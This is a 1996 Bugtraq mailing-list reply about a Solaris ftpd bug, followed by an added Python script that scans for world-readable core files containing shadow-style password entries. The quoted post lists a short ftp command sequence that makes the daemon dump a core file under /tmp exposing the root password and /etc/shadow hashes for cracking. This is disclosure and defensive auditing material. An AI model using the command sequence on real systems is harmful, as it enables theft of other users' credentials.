Bugtraq mailing list archives

Re: ftpd bug? Was: bin/1805: Bug in ftpd


From: runeb () td org uit no (Rune Braathen)
Date: Wed, 16 Oct 1996 11:10:35 +0200


On Tue, 15 Oct 1996, Martin Rex wrote:
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
> -Martin

Doing a `strings core` on the corefile produced also reveals the entire
/etc/shadow file on Solaris 2.4 and 2.5. This is extremely bad, because
this gives normal users the ability to merge in the encrypted strings in
the password file, and run crack et al.

The problem is related to users with accounts only; anonymous ftp users
should not be able to issue USER and PASS commands.

--
__________________________________________________________________
runeb / cF - runeb () td org uit no - http://www.td.org.uit.no/~runeb
a new life awaits you, in the off-world colonies.
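
A defensive check for the exposure described in this thread, as an added example that is not part of the original posts: it looks for core files that other users can read and counts shadow-style entries among their printable strings, without printing the entries. The file-name pattern, the regular expressions and the sample bytes are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Printable ASCII runs of 4+ bytes, the same default that `strings` uses.
STRINGS_RE = re.compile(rb"[\x20-\x7e]{4,}")
# Shadow-style entry: name:hash:lastchg:... (hash field of 13+ crypt characters).
SHADOW_RE = re.compile(rb"^[a-z_][a-z0-9_-]{0,31}:[A-Za-z0-9./$]{13,}:\d*:")


def audit_core(path):
    """Return (world_readable, shadow_like_count) for one core file."""
    mode = os.stat(path).st_mode
    world_readable = bool(mode & stat.S_IROTH)
    with open(path, "rb") as fh:
        data = fh.read()
    hits = sum(1 for s in STRINGS_RE.findall(data) if SHADOW_RE.match(s))
    return world_readable, hits


def scan(directory):
    """Return findings for files named core or core.* directly in directory."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if name == "core" or name.startswith("core."):
            path = os.path.join(directory, name)
            if os.path.isfile(path) and not os.path.islink(path):
                readable, hits = audit_core(path)
                if readable or hits:
                    findings.append((path, readable, hits))
    return findings


def demo():
    """Build a constructed core-like file in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "core")
        # Constructed sample bytes: not a real dump and not a real hash.
        blob = (b"\x7fELF\x00\x01root:abcdefghijklm:9000::::::\x00\x00"
                b"daemon:NP:6445::::::\x00")
        with open(path, "wb") as fh:
            fh.write(blob)
        os.chmod(path, 0o644)
        return [(os.path.basename(p), r, h) for p, r, h in scan(d)]


if __name__ == "__main__":
    print(demo())
```

Run `scan("/tmp")` (or any directory a daemon may dump core into) with sufficient privilege to read the files; a finding with a non-zero count means the credentials in that dump should be treated as exposed.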


